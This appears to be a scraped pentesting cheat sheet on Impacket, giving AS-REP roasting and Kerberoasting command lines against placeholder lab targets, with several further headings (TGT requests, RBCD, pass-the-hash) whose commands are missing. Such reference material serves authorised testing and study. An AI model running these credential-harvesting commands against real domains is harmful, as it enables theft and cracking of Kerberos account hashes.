📦Impacket
AS-REP Roasting (GetNPUsers)
AS-REP Roasting with User List
# AS-REP Roasting using a user list from 'users.txt'
impacket-GetNPUsers -no-pass -usersfile users.txt domain.htb/ 2>/dev/nullAS-REP Roasting for Specific User
# AS-REP Roasting for a specific user
impacket-GetNPUsers domain.htb/user -no-pass 2>/dev/nullKerberoasting Attack (GetUserSPNs)
Kerberoasting with Valid Credentials
# Kerberoasting Attack with valid credentials and NTLM authentication
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user -request 2>/dev/null
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/user:'password' -request 2>/dev/nullKerberoasting with Kerberos Authentication
Kerberoasting without Domain Credentials
Obtaining Ticket Granting Ticket [TGT] (getTGT)
TGT with Password Authentication
TGT with NTLM Hash
TGT with Kerberos Authentication
Resource Based Constrained Delegation [RBCD] (getST)
RBCD with NTLM Authentication
RBCD with Pass-the-Hash
RBCD with Kerberos Authentication
Important Notes
Prerequisites
Last updated